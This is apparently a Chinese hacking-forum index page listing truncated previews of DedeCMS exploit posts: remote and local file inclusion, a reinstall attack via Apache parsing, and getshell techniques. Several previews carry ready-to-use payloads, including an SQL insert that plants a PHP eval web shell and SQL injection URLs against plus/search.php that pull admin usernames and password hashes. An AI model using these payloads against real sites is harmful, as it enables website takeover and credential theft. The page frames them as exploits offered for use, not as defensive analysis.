• DedeCMS < 5.7-sp1远程文件包含漏洞

    DedeCMS < 5.7-sp1远程文件包含漏洞
    Published: 2015-06-29 Remote getshell Details: ======= After the default installation of dedecms Installation directory /install/index.php or /install/index.php.bak /install/index.php //run iis apache exploit /install/index.php.bak //run apache exploit Code analysis /install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:9,067次 | 标签:
  • Dede后台getshell【过20130715】

    Dede后台getshell【过20130715】
    测试版本为:V5.7 20130715 测试步骤: 后台——SQL命令运器——执行命令 INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES (2000, 0, 0, 'indexTopBanner1', '首页顶部导航大图-500*60', 0, 1297933028, 1300525028, '<?php file_put_contents(''08sec.php'',''<?php eval($_POST[08]);?&g...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:11,829次 | 标签:
  • dedecms最新版本修改任意管理员漏洞+getshell+exp【配图】

    dedecms最新版本修改任意管理员漏洞+getshell+exp【配图】
    此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:118,604次 | 标签:
  • Dedecms通杀重装漏洞 利用apache解析+变量覆盖

    Dedecms通杀重装漏洞 利用apache解析+变量覆盖
    利用条件是webserver要求是存在apache解析漏洞和install文件夹存在。 利用截图: Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak,这个在apache下面是会解析成PHP执行的。 看看/install/index.php.bak代码: $verMsg = ' V5.7 GBKSP1'; $s_lang = 'gb2312'; $dfDbname = 'dedecmsv57gbksp1'; $errmsg = ''; $install_demo_name = 'dedev57demo.txt'; $insLo...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:10,829次 | 标签:
  • dedecms本地文件包含及物理路径泄露0day

    dedecms本地文件包含及物理路径泄露0day
    晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯) 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里,估计这两个文件是临时工写的。 Include/payment/alipay.php ...... function respond...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:6,994次 | 标签:
  • [通杀]dedecms plus/search.php 注入漏洞利用方式

    [通杀]dedecms plus/search.php 注入漏洞利用方式
    作者:鬼哥 看结果如果提示 Safe Alert: Request Error step 2 ! 那么直接用下面的exp /plus/search.php?keyword=as&typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`'`+]=a 看结果如果提示 Safe Alert: Request Error step 1 ! 那么直接用下...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:25,671次 | 标签:
  • dedecms最新注入分析(可过gpc)

    dedecms最新注入分析(可过gpc)
    Author:唐门三少 代码分析省略。 PoC利用 在开启gpc的情况下 http://target/plus/search.php?typeArr[1%20or%20@`'`%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substring((Select%20(version())),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`'`]=11&&kwtype=0&q=1111&searchtype=title 在未开启gpc的情况下,虽然利用...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:6,747次 | 标签: